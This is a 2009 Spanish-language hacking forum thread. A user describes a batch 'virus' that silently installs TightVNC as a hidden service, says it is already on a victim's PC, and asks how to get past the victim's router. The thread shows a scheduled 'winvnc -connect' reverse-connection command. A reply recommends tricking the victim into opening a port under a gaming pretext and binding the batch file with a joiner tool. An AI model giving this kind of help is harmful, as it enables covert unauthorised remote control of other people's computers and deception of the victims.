elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 15:22  

Tema destacado: Últimos eventos sobre seguridad/inseguridad

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  COMANDO AT EN BATCH
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: COMANDO AT EN BATCH  (Leído 2,922 veces)
laraiz

Desconectado Desconectado

Ver Perfil
COMANDO AT EN BATCH
« en: 22 Julio 2009, 22:25 »

Hola que tal hakerianos  ;D

Queria hacerle Dos pregunta a una comunidad tan experta por que los novatos nos nutrimos de los más expertos   ;)

Bueno mi pregunta son dos la primera

Hice un virus batch con el TIGHTVNC lo he probado y funciona perfectamente  hace todo con un doble clic instala tightvnc luego abre los puertos lo pone como un servicio de sistema osea cada vez que reinicia sube y le oculta el tray icon al lado del reloj funciona de maravilla.  ;-)

Logre que se instalara en la pc de una victima pero no podia conectarme entonces me acorde de los puertos de router puse la ip de la victima en el explorador pero me di cuenta que su router tiene una contraseña y usuario en pocas palabras si no abro los puertos no puedo entrar a la pc ¿Mi pregunta es abra una manera de conectarme con el vncviewer sabiendo ip y sabiendo que el virus esta instalado en la maquina? como puedo burlar en router. osea se el ip se que tiene el virus pero el router me bloquea la entrada.

Ahora buscandole solución al tema anterior quise modificar mi virus y agregarle otras cositas pero el comando at no me funciona en batch ejemplo pongo la siguiente sintaxis

@echo off
at 4:00 /interactive /every:22 "c:\archiv~1\tightvnc\winvnc -connect 10.0.0.1"
exit

lo que me sale es la linea de comando de corrida pero no me corre el comando mienstras que si lo ejecuto por el cmd.exe normal me sale y me agrega la tarea normal pero por batch no me sale quisera saber que estoy haciendo mal lo he itentado de varias forma diferentes pero no me sale  :-\

kiaro

Ver Perfil
Re: COMANDO AT EN BATCH
« Respuesta #1 en: 24 Julio 2009, 04:02 »

1ro. Lo mejor que puedes hacer en estos casos, eso de abrirle puertos es ingenieria social, juegas algun juego?  puedes decirle que habra, un puerto determinado para x juego, y cuando lo haya habierto, lo ocupas tu.

2do. del Bath

El comando, AT la tarea lo ejecuta en modo SYSTEM asies que no hay opcion, te recomendaria que el code bath lo bindees, con el Quick Bath Compiler, busca en el foro, ya se ha hablado mucho en el foro.

saludos, espero que te haya servido. :D :D :D

kiaro

Ver Perfil
Re: COMANDO AT EN BATCH
« Respuesta #2 en: 24 Julio 2009, 04:04 »

Tutorial del Quick Bath Compiler

http://foro.elhacker.net/hacking_basico/manual_joiner_con_quick_batch_file_compiler-t187349.0.html

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Descubrimiento en comando FOR [Batch]
Scripting
Leo Gutiérrez. 0 992 Último mensaje 16 Abril 2009, 22:09
por Leo Gutiérrez.
[batch] mostrar ip utilizada con el comando net[Solucionado]
Scripting
moikano→@ 2 2,110 Último mensaje 14 Enero 2011, 21:50
por moikano→@
[BATCH] Programar un batch con comando at
Scripting
WaAYa HaCK 5 952 Último mensaje 14 Septiembre 2011, 19:12
por WaAYa HaCK
¿Como se utiliza claramente el comando for? (batch)
Scripting
the_Avenger 8 1,256 Último mensaje 20 Octubre 2011, 15:38
por $Edu$
[Batch] Comando For / F
Scripting
geormarsch 3 702 Último mensaje 10 Enero 2012, 21:19
por Leo Gutiérrez.